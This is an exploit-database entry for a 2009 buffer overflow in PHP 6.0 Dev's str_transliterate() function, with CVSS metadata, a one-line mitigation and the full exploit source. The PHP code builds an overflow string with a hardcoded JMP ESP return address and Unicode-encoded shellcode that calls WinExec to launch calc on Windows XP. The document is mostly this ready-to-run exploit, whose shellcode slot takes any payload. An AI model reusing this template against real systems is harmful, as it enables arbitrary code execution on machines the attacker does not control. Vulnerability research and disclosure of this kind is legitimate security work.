PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit

vendor:

PHP 6.0 Dev

by:

Pr0T3cT10n, TheLeader, Debug, HDM

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: PHP 6.0 Dev

Affected Version From: 6.0 Dev

Affected Version To: 6.0 Dev

Patch Exists: No

Related CWE: N/A

CPE: a:php:php:6.0_dev

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP HEB SP3, Apache, PHP 6.0 Dev

2009

PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit

This code exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC. The exploit requires that the 'unicode.semantics' setting in php.ini be set to 'on'.

Mitigation:

Ensure that the 'unicode.semantics' setting in php.ini is set to 'off'.

Source

Exploit-DB raw data:

<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
 $buff = str_repeat("\u4141", 256);
 $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
 $nops = str_repeat("\u9090", 20);

 # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
 $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
 
 # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
 # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
 
 $exploit = $buff.$eip.$nops.$shellcode;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!\r\n");
}

function ini_get_bool($a) {
 $b = ini_get($a);
 switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
 }
}
?>